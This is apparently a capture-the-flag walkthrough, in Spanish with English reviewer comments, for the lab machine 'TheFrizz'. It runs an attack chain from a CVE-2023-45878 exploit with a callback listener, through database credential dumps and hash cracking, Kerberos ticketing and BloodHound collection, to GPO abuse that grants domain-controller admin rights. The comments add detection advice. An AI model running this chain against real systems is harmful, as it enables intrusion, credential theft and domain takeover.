TheFrizz
Sacamos el nombre del dominio por LDAP:
# Base-scope LDAP search (-s base) with simple authentication (-x). No bind DN is
# given, so this is presumably an anonymous bind; a DC that answers it is
# disclosing naming information to unauthenticated clients.
ldapsearch -x -H ldap://10.10.11.60 -s base
# Runs a local proof-of-concept script named after CVE-2023-45878 against the host.
# The meaning of -s/-i/-p is defined by that script and is not shown on this page;
# presumably -i/-p are a callback address and port (confirm against the script).
# Defender view: the fix is to patch the affected application, and an outbound
# connection from the web server to an unfamiliar host:port is a detection point.
python3 CVE-2023-45878.py -t frizzdc.frizz.htb -s -i 10.10.14.130 -p 4444
# Runs the mysql client non-interactively (-e) against the "gibbon" database and dumps
# the gibbonperson table; -E prints each row vertically.
# The database password is passed on the command line, so process-creation /
# command-line logging on the host would record it in clear text.
.\mysql.exe -u MrGibbonsDB -p "MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson;" -E
f.frizzle:$dynamic_82$067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
# List the dynamic subformats john supports, to find one matching the hash layout.
john --list=subformats
# Test wordlist candidates against the hash as a single SHA-256 over salt followed by password.
# A single unstretched hash round like this is cheap to guess offline; storing passwords
# with a slow, salted KDF is the mitigation.
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt frizle-hash.txt
# Print the recovered password for the hashes in the given file.
# NOTE(review): this line names hash.txt while the line above uses frizle-hash.txt;
# both should refer to the same hash file.
john --show --format=dynamic='sha256($s.$p)' hash.txt
f.frizzle \ Jenni_Luvs_Magic23
# Sync the local clock with the DC: Kerberos rejects requests whose timestamps fall
# outside the allowed clock skew.
sudo ntpdate DC
# Request a Kerberos TGT with the account's password; DOMAIN, USER, PASS and DC are
# placeholders. The ticket is written to a credential-cache file.
impacket-getTGT DOMAIN/'USER':'PASS' -dc-ip DC
# Point Kerberos-aware tools at that credential cache.
export KRB5CCNAME=USER.ccache
# Authenticate to SMB on the DC using Kerberos (-k).
netexec smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -k
Estos no funcionan:
# NOTE(review): the page does not say whether all three commands below failed or only
# the first ones.
# -K enables GSSAPI (Kerberos) authentication and forwarding of the GSSAPI credentials.
ssh f.frizzle@frizz.htb -K
# WinRM session with -r giving the Kerberos realm.
# NOTE(review): the host is spelled frizzdc.drizz.htb here but frizzdc.frizz.htb
# everywhere else on the page.
evil-winrm -i frizzdc.drizz.htb -r frizz.htb -k f.frizzle.ccache
# Collect Active Directory data for BloodHound: -c all runs every collection method,
# --zip packs the output, -k uses Kerberos, -ns sets the DNS server.
# Defender view: this shows up as a burst of LDAP queries from a single client, which
# directory-service / LDAP query monitoring on the DC can surface.
bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip -k
# List what is in the current user's Recycle Bin (shell special folder 0xA),
# showing each item's display name and path.
$shellApp = New-Object -ComObject Shell.Application
$bin = $shellApp.Namespace(0xA)
$bin.Items() | Select-Object -Property Name, Path
Restore the deleted file from the Recycle Bin:
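# Restore "wapt-backup-sunday.7z" from the Recycle Bin by moving it to the
# current user's Desktop.
$recycleBin = (New-Object -ComObject Shell.Application).NameSpace(0xA)
$items = $recycleBin.Items()
# Select the deleted entry by its display name.
$item = $items | Where-Object { $_.Name -eq "wapt-backup-sunday.7z" }
# The destination is the Desktop folder, so the variables are named for it
# (the original called them "documents" although it resolved "Desktop").
$desktopPath = [Environment]::GetFolderPath("Desktop")
$desktop = (New-Object -ComObject Shell.Application).NameSpace($desktopPath)
if ($item) {
    $desktop.MoveHere($item)
} else {
    # Without this guard a missing entry would pass $null to MoveHere.
    Write-Warning "wapt-backup-sunday.7z was not found in the Recycle Bin"
}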
M.schoolbus \ !suBcig@MehTed!R
Para abusar de la creación de GPOs:
# Create a new, empty Group Policy Object named "hacker".
New-GPO -Name "hacker"
# Link that GPO to the Domain Controllers OU so its settings apply to the DCs.
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
# Add a setting to the GPO that makes M.SchoolBus a local administrator wherever it applies.
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
# Force an immediate Group Policy refresh instead of waiting for the normal interval.
# Defender view: this chain only works when a non-admin account may both create GPOs
# and link them to the Domain Controllers OU. Review that delegation, and alert on new
# GPOs and on new links to that OU (directory-service change auditing, e.g. events 5136/5137).
gpupdate /force